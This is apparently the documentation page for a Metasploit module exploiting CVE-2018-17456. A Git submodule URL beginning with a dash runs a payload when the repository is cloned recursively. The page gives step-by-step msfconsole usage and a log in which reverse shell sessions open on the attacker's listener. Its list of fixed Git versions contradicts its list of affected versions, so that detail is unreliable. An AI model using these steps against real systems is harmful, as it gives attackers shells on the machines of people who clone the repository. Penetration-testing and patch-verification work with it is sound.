## Description

  This module exploits CVE-2018-17456, which affects Git versions 2.14.5, 2.15.3, 2.16.5, 2.17.2, 2.18.1, and 2.19.1 and lower.  

  When a submodule url which starts with a dash e.g "-u./payload" is passed as an argument to git clone, the file "payload" inside the repository is executed.

  This module creates a fake git repository which contains a submodule containing the vulnerability. The vulnerability is triggered when the submodules are initialised (e.g git clone --recurse-submodules URL)

## Vulnerable Application

  Git can be installed on a variety of operating systems, however
  newer versions will contain the patch for this vulnerability.

  On OSX it can be installed with the XCode command line tools:
  `xcode-select --install`
  
  On Linux it can be installed with apt:
  `sudo apt-get update && sudo apt-get install git`

  You can check the version with `git --version`.
  The fix is included in the following version:
    2.7.6, 2.8.6, 2.9.5, 2.10.4, 2.11.3, 2.12.4, 2.13.5, 2.14.1

## Verification Steps

  Example steps in this format:

  1. Install the application
  1. Start msfconsole
  1. Do: `use exploit/multi/http/git_submodule_url_exec`
  1. Do: `set LHOST [local host]`
  1. Do: `exploit`
  1. Clone the malicious Git URI and its submodules (e.g `git clone --recurse-submodules GIT_URL`)
  1. You should get a shell

## Options

  **GIT_URI**

  This is the URI the git repository will be hosted from (defaults to random).

  **GIT_SUBMODULE**

  This is the URI of the submodule within the git repository (defaults to random).
  The url of this submodule, when cloned, will execute the payload.

## Scenarios


```
msf > use exploit/multi/http/git_submodule_url_exec
msf exploit(multi/http/git_submodule_url_exec) > set LHOST 192.168.0.1
LHOST => 192.168.0.1
msf exploit(multi/http/git_submodule_url_exec) > exploit
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.0.1:4444
msf exploit(multi/http/git_submodule_url_exec) > [*] Using URL: http://0.0.0.0:8080/yaDlXuHVnRMMYGQ
[*] Local IP: http://192.168.0.1:8080/yaDlXuHVnRMMYGQ
[*] Server started.
[*] Malicious Git URI is http://192.168.0.1:8080/ogkvs.git
[*] Command shell session 1 opened (192.168.0.1:4444 -> 192.168.0.1:41034) at 2018-10-18 12:41:40 +0000
[*] Command shell session 2 opened (192.168.0.1:4444 -> 192.168.0.1:41036) at 2018-10-18 12:41:41 +0000
```

On the victim side:

```
git clone --recurse-submodules http://192.168.0.1:8080/ogkvs.git
Cloning into 'ogkvs'...
Submodule 'lfr:lr' (-u./rDwoZ) registered for path 'lfr:lr'
Cloning into 'lr'...
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '-u./rDwoZ' into submodule path 'ogkvs/lfr:lr' failed
Failed to clone 'lfr:lr'. Retry scheduled
Cloning into 'lr'...
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.
fatal: clone of '-u./rDwoZ' into submodule path 'ogkvs/lfr:lr' failed
Failed to clone 'lfr:lr' a second time, aborting
```
